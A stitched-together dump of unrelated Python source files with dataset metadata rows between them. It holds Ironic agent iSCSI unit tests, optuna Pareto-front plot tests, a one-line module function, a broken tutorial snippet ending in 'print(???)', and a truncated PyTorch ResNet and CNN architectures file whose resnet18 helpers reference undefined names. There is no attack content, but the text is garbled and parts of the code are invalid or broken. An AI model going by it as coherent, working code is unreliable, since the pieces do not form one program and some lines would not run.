@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot',
mock.Mock(side_effect=iscsi.rtslib_fb.RTSLibError()))
class TestISCSIExtensionTgt(base.IronicAgentTest):
def setUp(self):
super(TestISCSIExtensionTgt, self).setUp()
self.agent_extension = iscsi.ISCSIExtension(FakeAgent())
self.fake_dev = '/dev/fake'
self.fake_iqn = 'iqn-fake'
def test_start_iscsi_target(self, mock_execute,
mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_execute.return_value = ('', '')
self.assertFalse(self.agent_extension.agent.iscsi_started)
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
self.assertTrue(self.agent_extension.agent.iscsi_started)
expected = [mock.call('tgtd'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'show', attempts=10),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'new', '--tid', '1',
'--targetname', self.fake_iqn),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'logicalunit', '--op', 'new', '--tid', '1',
'--lun', '1', '--backing-store', self.fake_dev),
mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
'--op', 'bind', '--tid', '1',
'--initiator-address', 'ALL')]
mock_execute.assert_has_calls(expected)
mock_dispatch.assert_called_once_with('get_os_install_device')
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
self.assertFalse(mock_destroy.called)
def test_start_iscsi_target_with_special_port(self, mock_execute,
mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_execute.return_value = ('', '')
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn,
portal_port=3268)
expected = [mock.call('tgtd'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'show', attempts=10),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'portal', '--op', 'new', '--param',
'portal=0.0.0.0:3268'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'new', '--tid', '1',
'--targetname', self.fake_iqn),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'logicalunit', '--op', 'new', '--tid', '1',
'--lun', '1', '--backing-store', self.fake_dev),
mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
'--op', 'bind', '--tid', '1',
'--initiator-address', 'ALL')]
mock_execute.assert_has_calls(expected)
mock_dispatch.assert_called_once_with('get_os_install_device')
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
def test_start_iscsi_target_fail_wait_daemon(self, mock_execute,
mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
# side effects here:
# - execute tgtd: stdout=='', stderr==''
# - induce tgtadm failure while in _wait_for_scsi_daemon
mock_execute.side_effect = [('', ''),
processutils.ProcessExecutionError('blah')]
self.assertRaises(errors.ISCSIError,
self.agent_extension.start_iscsi_target,
iqn=self.fake_iqn)
expected = [mock.call('tgtd'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
'--op', 'show', attempts=10)]
mock_execute.assert_has_calls(expected)
mock_dispatch.assert_called_once_with('get_os_install_device')
self.assertFalse(mock_destroy.called)
@mock.patch.object(iscsi, '_wait_for_tgtd', autospec=True)
def test_start_iscsi_target_fail_command(self, mock_wait_iscsi,
mock_execute, mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_execute.side_effect = [('', ''), ('', ''),
processutils.ProcessExecutionError('blah')]
self.assertRaises(errors.ISCSIError,
self.agent_extension.start_iscsi_target,
iqn=self.fake_iqn)
expected = [mock.call('tgtd'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'new', '--tid', '1',
'--targetname', self.fake_iqn)]
mock_execute.assert_has_calls(expected)
mock_dispatch.assert_called_once_with('get_os_install_device')
def test_start_iscsi_target_fail_command_not_exist(self, mock_execute,
mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_execute.side_effect = OSError('file not found')
self.assertRaises(errors.ISCSIError,
self.agent_extension.start_iscsi_target,
iqn=self.fake_iqn)
_ORIG_UTILS = iscsi.rtslib_fb.utils
@mock.patch.object(disk_utils, 'destroy_disk_metadata', autospec=True)
@mock.patch.object(hardware, 'dispatch_to_managers', autospec=True)
# Don't mock the utils module, as it contains exceptions
@mock.patch.object(iscsi, 'rtslib_fb', utils=_ORIG_UTILS, autospec=True)
class TestISCSIExtensionLIO(base.IronicAgentTest):
def setUp(self):
super(TestISCSIExtensionLIO, self).setUp()
self.agent_extension = iscsi.ISCSIExtension(FakeAgent())
self.fake_dev = '/dev/fake'
self.fake_iqn = 'iqn-fake'
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_start_iscsi_target(self, mock_get_wildcard_address,
mock_rtslib, mock_dispatch,
mock_destroy):
mock_get_wildcard_address.return_value = '::'
mock_dispatch.return_value = self.fake_dev
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '[::]', 3260)
self.assertFalse(mock_destroy.called)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_start_iscsi_target_noipv6(self, mock_get_wildcard_address,
mock_rtslib, mock_dispatch,
mock_destroy):
mock_get_wildcard_address.return_value = '0.0.0.0'
mock_dispatch.return_value = self.fake_dev
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '0.0.0.0', 3260)
self.assertFalse(mock_destroy.called)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_start_iscsi_target_with_special_port(self,
mock_get_wildcard_address,
mock_rtslib, mock_dispatch,
mock_destroy):
mock_get_wildcard_address.return_value = '::'
mock_dispatch.return_value = self.fake_dev
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn,
portal_port=3266)
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '[::]', 3266)
def test_failed_to_start_iscsi(self, mock_rtslib, mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_rtslib.Target.side_effect = _ORIG_UTILS.RTSLibError()
self.assertRaisesRegex(
errors.ISCSIError, 'Failed to create a target',
self.agent_extension.start_iscsi_target, iqn=self.fake_iqn)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_failed_to_bind_iscsi(self, mock_get_wildcard_address,
mock_rtslib, mock_dispatch, mock_destroy):
mock_get_wildcard_address.return_value = '::'
mock_dispatch.return_value = self.fake_dev
mock_rtslib.NetworkPortal.side_effect = _ORIG_UTILS.RTSLibError()
self.assertRaisesRegex(
errors.ISCSIError, 'Failed to publish a target',
self.agent_extension.start_iscsi_target, iqn=self.fake_iqn,
portal_port=None)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '[::]', 3260)
self.assertFalse(mock_destroy.called)
def test_failed_to_start_iscsi_wipe_disk_metadata(self, mock_rtslib,
mock_dispatch,
mock_destroy):
mock_dispatch.return_value = self.fake_dev
mock_rtslib.Target.side_effect = _ORIG_UTILS.RTSLibError()
self.assertRaisesRegex(
errors.ISCSIError, 'Failed to create a target',
self.agent_extension.start_iscsi_target,
iqn=self.fake_iqn,
wipe_disk_metadata=True)
mock_destroy.assert_called_once_with('/dev/fake', 'my_node_uuid')
@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot', autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
class TestISCSIExtensionCleanUpFallback(base.IronicAgentTest):
def setUp(self):
super(TestISCSIExtensionCleanUpFallback, self).setUp()
self.agent_extension = iscsi.ISCSIExtension()
self.fake_dev = '/dev/fake'
self.fake_iqn = 'iqn-fake'
def test_lio_not_available(self, mock_execute, mock_rtslib):
mock_execute.return_value = ('', '')
mock_rtslib.side_effect = EnvironmentError()
expected = [mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'unbind', '--tid', '1',
'--initiator-address', 'ALL'),
mock.call('sync'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
'--op', 'delete', '--tid', '1')]
iscsi.clean_up(self.fake_dev)
mock_execute.assert_has_calls(expected)
def test_commands_fail(self, mock_execute, mock_rtslib):
mock_execute.side_effect = [processutils.ProcessExecutionError(),
('', ''),
processutils.ProcessExecutionError()]
mock_rtslib.side_effect = EnvironmentError()
expected = [mock.call('tgtadm', '--lld', 'iscsi', '--mode',
'target', '--op', 'unbind', '--tid', '1',
'--initiator-address', 'ALL'),
mock.call('sync'),
mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
'--op', 'delete', '--tid', '1')]
iscsi.clean_up(self.fake_dev)
mock_execute.assert_has_calls(expected)
@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot', autospec=True)
class TestISCSIExtensionCleanUp(base.IronicAgentTest):
def setUp(self):
super(TestISCSIExtensionCleanUp, self).setUp()
self.agent_extension = iscsi.ISCSIExtension()
self.fake_dev = '/dev/fake'
self.fake_iqn = 'iqn-fake'
def test_device_not_found(self, mock_rtslib):
mock_rtslib.return_value.storage_objects = []
iscsi.clean_up(self.fake_dev)
def test_ok(self, mock_rtslib):
mock_rtslib.return_value.storage_objects = [
mock.Mock(udev_path='wrong path'),
mock.Mock(udev_path=self.fake_dev),
mock.Mock(udev_path='wrong path'),
]
# mocks don't play well with name attribute
for i, fake_storage in enumerate(
mock_rtslib.return_value.storage_objects):
fake_storage.name = 'iqn%d' % i
mock_rtslib.return_value.targets = [
mock.Mock(wwn='iqn0'),
mock.Mock(wwn='iqn1'),
]
iscsi.clean_up(self.fake_dev)
for fake_storage in mock_rtslib.return_value.storage_objects:
self.assertEqual(fake_storage.udev_path == self.fake_dev,
fake_storage.delete.called)
for fake_target in mock_rtslib.return_value.targets:
self.assertEqual(fake_target.wwn == 'iqn1',
fake_target.delete.called)
def test_delete_fails(self, mock_rtslib):
mock_rtslib.return_value.storage_objects = [
mock.Mock(udev_path='wrong path'),
mock.Mock(udev_path=self.fake_dev),
mock.Mock(udev_path='wrong path'),
]
# mocks don't play well with name attribute
for i, fake_storage in enumerate(
mock_rtslib.return_value.storage_objects):
fake_storage.name = 'iqn%d' % i
mock_rtslib.return_value.targets = [
mock.Mock(wwn='iqn0'),
mock.Mock(wwn='iqn1'),
]
mock_rtslib.return_value.targets[1].delete.side_effect = (
_ORIG_UTILS.RTSLibError())
self.assertRaises(errors.ISCSIError, iscsi.clean_up, self.fake_dev)
| 47.238961
| 79
| 0.585583
| 1,954
| 18,187
| 5.145855
| 0.120266
| 0.061661
| 0.033913
| 0.049727
| 0.831726
| 0.815813
| 0.763998
| 0.736251
| 0.736251
| 0.713277
| 0
| 0.006178
| 0.305768
| 18,187
| 384
| 80
| 47.361979
| 0.790195
| 0.046792
| 0
| 0.734824
| 0
| 0
| 0.097199
| 0.018597
| 0
| 0
| 0
| 0
| 0.166134
| 1
| 0.067093
| false
| 0
| 0.025559
| 0.003195
| 0.115016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
134aa0e62634bd41e5d505092cdb41995b50e17e
| 8,253
|
py
|
Python
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
agarwalrounak/optuna
|
b5fd0439dc33c94c06251974b8cb023a3f9bccc7
|
[
"MIT"
] | 2
|
2020-09-21T21:55:46.000Z
|
2021-04-11T09:56:55.000Z
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | 5
|
2021-05-23T08:39:21.000Z
|
2021-05-23T09:34:55.000Z
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | null | null | null |
import itertools
from typing import List
from typing import Optional
import numpy as np
import pytest
import optuna
from optuna.visualization.matplotlib import plot_pareto_front
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
@pytest.mark.parametrize("axis_order", [None, [0, 1], [1, 0]])
def test_plot_pareto_front_2d(
include_dominated_trials: bool, axis_order: Optional[List[int]]
) -> None:
# Test with no trial.
study = optuna.create_study(directions=["minimize", "minimize"])
figure = plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
assert not figure.has_data()
# Test with three trials.
study.enqueue_trial({"x": 1, "y": 1})
study.enqueue_trial({"x": 1, "y": 0})
study.enqueue_trial({"x": 0, "y": 1})
study.optimize(lambda t: [t.suggest_int("x", 0, 1), t.suggest_int("y", 0, 1)], n_trials=3)
figure = plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
assert figure.has_data()
# Test with `target_names` argument.
with pytest.raises(ValueError):
plot_pareto_front(
study=study, target_names=[], include_dominated_trials=include_dominated_trials
)
with pytest.raises(ValueError):
plot_pareto_front(
study=study, target_names=["Foo"], include_dominated_trials=include_dominated_trials
)
with pytest.raises(ValueError):
plot_pareto_front(
study=study,
target_names=["Foo", "Bar", "Baz"],
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
target_names = ["Foo", "Bar"]
figure = plot_pareto_front(
study=study,
target_names=target_names,
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
assert figure.has_data()
if axis_order is None:
assert figure.get_xlabel() == target_names[0]
assert figure.get_ylabel() == target_names[1]
else:
assert figure.get_xlabel() == target_names[axis_order[0]]
assert figure.get_ylabel() == target_names[axis_order[1]]
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
@pytest.mark.parametrize(
"axis_order", [None] + list(itertools.permutations(range(3), 3)) # type: ignore
)
def test_plot_pareto_front_3d(
include_dominated_trials: bool, axis_order: Optional[List[int]]
) -> None:
# Test with no trial.
study = optuna.create_study(directions=["minimize", "minimize", "minimize"])
figure = plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
assert not figure.has_data()
# Test with three trials.
study.enqueue_trial({"x": 1, "y": 1, "z": 1})
study.enqueue_trial({"x": 1, "y": 0, "z": 1})
study.enqueue_trial({"x": 1, "y": 1, "z": 0})
study.optimize(
lambda t: [t.suggest_int("x", 0, 1), t.suggest_int("y", 0, 1), t.suggest_int("z", 0, 1)],
n_trials=3,
)
figure = plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
assert figure.has_data()
# Test with `target_names` argument.
with pytest.raises(ValueError):
plot_pareto_front(
study=study,
target_names=[],
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
with pytest.raises(ValueError):
plot_pareto_front(
study=study,
target_names=["Foo"],
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
with pytest.raises(ValueError):
plot_pareto_front(
study=study,
target_names=["Foo", "Bar"],
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
with pytest.raises(ValueError):
plot_pareto_front(
study=study,
target_names=["Foo", "Bar", "Baz", "Qux"],
include_dominated_trials=include_dominated_trials,
axis_order=axis_order,
)
target_names = ["Foo", "Bar", "Baz"]
figure = plot_pareto_front(study=study, target_names=target_names, axis_order=axis_order)
assert figure.has_data()
if axis_order is None:
assert figure.get_xlabel() == target_names[0]
assert figure.get_ylabel() == target_names[1]
assert figure.get_zlabel() == target_names[2]
else:
assert figure.get_xlabel() == target_names[axis_order[0]]
assert figure.get_ylabel() == target_names[axis_order[1]]
assert figure.get_zlabel() == target_names[axis_order[2]]
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
def test_plot_pareto_front_unsupported_dimensions(include_dominated_trials: bool) -> None:
# Unsupported: n_objectives == 1.
with pytest.raises(ValueError):
study = optuna.create_study(directions=["minimize"])
study.optimize(lambda t: [0], n_trials=1)
plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)
with pytest.raises(ValueError):
study = optuna.create_study(direction="minimize")
study.optimize(lambda t: [0], n_trials=1)
plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)
# Unsupported: n_objectives == 4.
with pytest.raises(ValueError):
study = optuna.create_study(directions=["minimize", "minimize", "minimize", "minimize"])
study.optimize(lambda t: [0, 0, 0, 0], n_trials=1)
plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("dimension", [2, 3])
@pytest.mark.parametrize("include_dominated_trials", [False, True])
def test_plot_pareto_front_invalid_axis_order(
dimension: int, include_dominated_trials: bool
) -> None:
study = optuna.create_study(directions=["minimize"] * dimension)
study.optimize(lambda t: [0] * dimension, n_trials=1)
# Invalid: len(axis_order) != dimension
with pytest.raises(ValueError):
invalid_axis_order = list(range(dimension + 1))
assert len(invalid_axis_order) != dimension
plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=invalid_axis_order,
)
# Invalid: np.unique(axis_order).size != dimension
with pytest.raises(ValueError):
invalid_axis_order = list(range(dimension))
invalid_axis_order[1] = invalid_axis_order[0]
assert np.unique(invalid_axis_order).size != dimension
plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=invalid_axis_order,
)
# Invalid: max(axis_order) > (dimension - 1)
with pytest.raises(ValueError):
invalid_axis_order = list(range(dimension))
invalid_axis_order[-1] += 1
assert max(invalid_axis_order) > (dimension - 1)
plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=invalid_axis_order,
)
# Invalid: min(axis_order) < 0
with pytest.raises(ValueError):
study = optuna.create_study(directions=["minimize", "minimize"])
study.optimize(lambda t: [0] * 2, n_trials=1)
invalid_axis_order = list(range(dimension))
invalid_axis_order[0] -= 1
assert min(invalid_axis_order) < 0
plot_pareto_front(
study=study,
include_dominated_trials=include_dominated_trials,
axis_order=invalid_axis_order,
)
| 35.573276
| 97
| 0.668605
| 989
| 8,253
| 5.282103
| 0.094034
| 0.099923
| 0.193721
| 0.07657
| 0.88438
| 0.857389
| 0.849732
| 0.82791
| 0.80915
| 0.799579
| 0
| 0.011464
| 0.21786
| 8,253
| 231
| 98
| 35.727273
| 0.797831
| 0.047619
| 0
| 0.607527
| 0
| 0
| 0.061815
| 0.035177
| 0
| 0
| 0
| 0
| 0.107527
| 1
| 0.021505
| false
| 0
| 0.037634
| 0
| 0.05914
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
134f60fb7797c96f9718860d1a3bdcd352cb0343
| 97
|
py
|
Python
|
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
def hello_from_sub_module_functions():
print("Hello!!! From sub_module.sub_module_functions")
| 48.5
| 58
| 0.804124
| 14
| 97
| 5.071429
| 0.5
| 0.380282
| 0.338028
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 97
| 2
| 58
| 48.5
| 0.797753
| 0
| 0
| 0
| 0
| 0
| 0.459184
| 0.316327
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
135735366896684c5cf45e6004f77c2304bf7a47
| 136
|
py
|
Python
|
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
monty_python = "Monty Python"
print(monty_python)
print(monty_python.lower()) # Print lower-cased version of the string
print(???)
| 19.428571
| 72
| 0.735294
| 19
| 136
| 5.105263
| 0.473684
| 0.453608
| 0.329897
| 0.43299
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 6
| 73
| 22.666667
| 0.82906
| 0.286765
| 0
| 0
| 0
| 0
| 0.126316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
136fb3fdf1b1a862c5676bccfbac532b7cfe86e4
| 29,985
|
py
|
Python
|
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | 4
|
2021-03-01T17:43:48.000Z
|
2022-03-24T11:28:48.000Z
|
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | null | null | null |
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | null | null | null |
import sys
import math
import itertools
import torch
from torch import nn
from torch.nn import functional as F
from torch.autograd import Variable, Function
from .utils import export, parameter_count
import pdb
@export
def cifar_cnn_single(pretrained=False, **kwargs):
assert not pretrained
model = CNNSingle(**kwargs)
return model
@export
def cifar_cnn_gauss_single(pretrained=False, **kwargs):
assert not pretrained
model = CNNGaussSingle(**kwargs)
return model
@export
def cifar_cnn(pretrained=False, **kwargs):
assert not pretrained
model = CNN(**kwargs)
return model
@export
def cifar_cnn_gauss(pretrained=False, **kwargs):
assert not pretrained
model = CNNGauss(**kwargs)
return model
# This name is exported to command line arguments
@export
def cifar_shakeshake26(pretrained=False, **kwargs):
assert not pretrained
model = ResNet32x32(ShakeShakeBlock,
layers=[4, 4, 4],
channels=96,
downsample='shift_conv', **kwargs)
# 26 2x96d
# groups = 1
# Shake-Even-Image
return model
# This one is for imagenet
# This name is exported to command line arguments
@export
def resnext152(pretrained=False, **kwargs):
assert not pretrained
model = ResNet224x224(BottleneckBlock,
layers=[3, 8, 36, 3],
channels=32 * 4,
groups=32,
downsample='basic', **kwargs)
return model
@export
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
return model
@export
def resnet18_double(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNetDouble(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
return model
class ResNet224x224(nn.Module):
def __init__(self, block, layers, channels, groups=1, num_classes=1000, downsample='basic', isL2=False, sobel=False):
super().__init__()
assert len(layers) == 4
self.isL2 = isL2
self.downsample_mode = downsample
self.inplanes = 64
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, channels, groups, layers[0])
self.layer2 = self._make_layer(
block, channels * 2, groups, layers[1], stride=2)
self.layer3 = self._make_layer(
block, channels * 4, groups, layers[2], stride=2)
self.layer4 = self._make_layer(
block, channels * 8, groups, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(7)
self.fc1 = nn.Linear(block.out_channels(
channels * 8, groups), num_classes)
self.fc2 = nn.Linear(block.out_channels(
channels * 8, groups), num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, groups, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != block.out_channels(planes, groups):
if self.downsample_mode == 'basic' or stride == 1:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, block.out_channels(planes, groups),
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(block.out_channels(planes, groups)),
)
elif self.downsample_mode == 'shift_conv':
downsample = ShiftConvDownsample(in_channels=self.inplanes,
out_channels=block.out_channels(planes, groups))
else:
assert False
layers = []
layers.append(block(self.inplanes, planes, groups, stride, downsample))
self.inplanes = block.out_channels(planes, groups)
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, groups))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
return self.fc1(x), self.fc2(x)
class ResNet32x32(nn.Module):
def __init__(self, block, layers, channels, groups=1, num_classes=1000, downsample='basic'):
super().__init__()
assert len(layers) == 3
self.downsample_mode = downsample
self.inplanes = 16
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1,
padding=1, bias=False)
self.layer1 = self._make_layer(block, channels, groups, layers[0])
self.layer2 = self._make_layer(
block, channels * 2, groups, layers[1], stride=2)
self.layer3 = self._make_layer(
block, channels * 4, groups, layers[2], stride=2)
self.avgpool = nn.AvgPool2d(8)
self.fc1 = nn.Linear(block.out_channels(
channels * 4, groups), num_classes)
self.fc2 = nn.Linear(block.out_channels(
channels * 4, groups), num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, groups, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != block.out_channels(planes, groups):
if self.downsample_mode == 'basic' or stride == 1:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, block.out_channels(planes, groups),
kernel_size=1, stride=stride, bias=False),
